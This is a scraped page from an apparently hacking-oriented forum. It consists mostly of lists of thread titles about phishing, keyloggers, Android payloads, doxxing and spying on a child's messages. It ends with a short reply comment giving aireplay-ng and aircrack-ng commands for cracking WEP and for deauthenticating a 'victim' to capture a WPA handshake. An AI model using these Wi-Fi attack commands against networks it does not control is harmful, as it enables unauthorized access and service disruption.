- Hot
- Active
-
Metasploit Error: Handler Failed to Bind 40 Replies
1 day ago -
Forum Thread: How to Know if You Are a Script Kiddie? 9 Replies
2 wks ago -
Forum Thread: How to Identify and Crack Hashes 8 Replies
2 wks ago -
Forum Thread: How to Hack School Website 8 Replies
2 wks ago -
Forum Thread: Whenever I Try "Airmon-Ng Start wlan0" There's an Error? 16 Replies
3 wks ago -
Forum Thread: How to Fix 'Failed to Detect and Mount CD-ROM' Problem When Installing Kali Linux 14 Replies
3 wks ago -
Forum Thread: Awesome Keylogging Script - BeeLogger 30 Replies
4 wks ago -
Forum Thread: How to Hack Android Phone Using Same Wifi 27 Replies
1 mo ago -
Forum Thread: Complete Guide to Creating and Hosting a Phishing Page for Beginners 48 Replies
1 mo ago -
Forum Thread: Create and Use Android/Meterpreter/reverse_tcp APK with Msfvenom? 121 Replies
1 mo ago -
How to: Minecraft DoS'Ing with Python. 1 Replies
2 mo ago -
Forum Thread: HELP I Created an Apk for Hacking My Phone Using Kali Linux in Virtual Box How Can I Install That Apk on My Phone 17 Replies
2 mo ago -
Forum Thread: Tools for Beginner Hacker 3 Replies
2 mo ago -
Forum Thread: How to Embed an Android Payload in an Image? 9 Replies
3 mo ago -
Forum Thread: Metasploit reverse_tcp Handler Problem 46 Replies
3 mo ago -
Forum Thread: HACK ANDROID with KALI USING PORT FORWARDING(portmap.io) 11 Replies
3 mo ago -
Forum Thread: Fix Initramfs Problem 5 Replies
3 mo ago -
Forum Thread: Kali Wont Start, Stuck at Kali Login: 21 Replies
4 mo ago -
Forum Thread: How to View Your Child's What's App And Many More! 3 Replies
4 mo ago -
Forum Thread: Proxy Lists for Proxy Chains 1 Replies
5 mo ago
-
How To: Gain SSH Access to Servers by Brute-Forcing Credentials
-
How To: Brute-Force Nearly Any Website Login with Hatch
-
How To: Dox Anyone
-
How to Hack Wi-Fi: Cracking WPA2-PSK Passwords Using Aircrack-Ng
-
How To: Hack Web Browsers with BeEF to Control Webcams, Phish for Credentials & More
-
How To: Check if Your Wireless Network Adapter Supports Monitor Mode & Packet Injection
-
How To: Buy the Best Wireless Network Adapter for Wi-Fi Hacking in 2019
-
How To: Phish Social Media Sites with SocialFish
-
How to Hack Wi-Fi: Stealing Wi-Fi Passwords with an Evil Twin Attack
-
How To: Top 10 Things to Do After Installing Kali Linux
-
Android for Hackers: How to Turn an Android Phone into a Hacking Device Without Root
-
How To: Brute-Force FTP Credentials & Get Server Access
-
How To: Enumerate SMB with Enum4linux & Smbclient
-
How To: Use Burp & FoxyProxy to Easily Switch Between Proxy Settings
-
How To: Use Command Injection to Pop a Reverse Shell on a Web Server
-
How To: The Hacks Behind Cracking, Part 1: How to Bypass Software Registration
-
How To: Perform Advanced Man-in-the-Middle Attacks with Xerosploit
-
How To: Use SQL Injection to Run OS Commands & Get a Shell
-
How To: Find Identifying Information from a Phone Number Using OSINT Tools
-
How To: Find Vulnerable Webcams Across the Globe Using Shodan
2 Responses
for WEP encrypted wifi:
you need to get more than 5000 IVs...you don't deauth, and if there's no client connected to the Access Point, you can join it as a client by adding your mac address. to get your mac address type: macchanger -s wlan0mon (or wlan1mon etc...). Now type:
aireplay-ng -1 0 -a mac-of-the-victim -h your-mac-address wlan0mon
example:
aireplay-ng -1 0 -a 00:11:22:33:44:55 -h 1B:2C:3D:4E:5F:6G wlan0mon
then aircrack-ng /path/to/blabla.cap
for WPA and WPA2:
you need to get a HANDSHAKE
deauth the victim by typing:
aireplay-ng -0 50 -a mac-of-the-victim-AP -c mac-of-the-victim-computer wlan0mon
if you're faaaaaaaaar from the victim, the signal is weak, so the attack may not succeed
-Nevermind-
Share Your Thoughts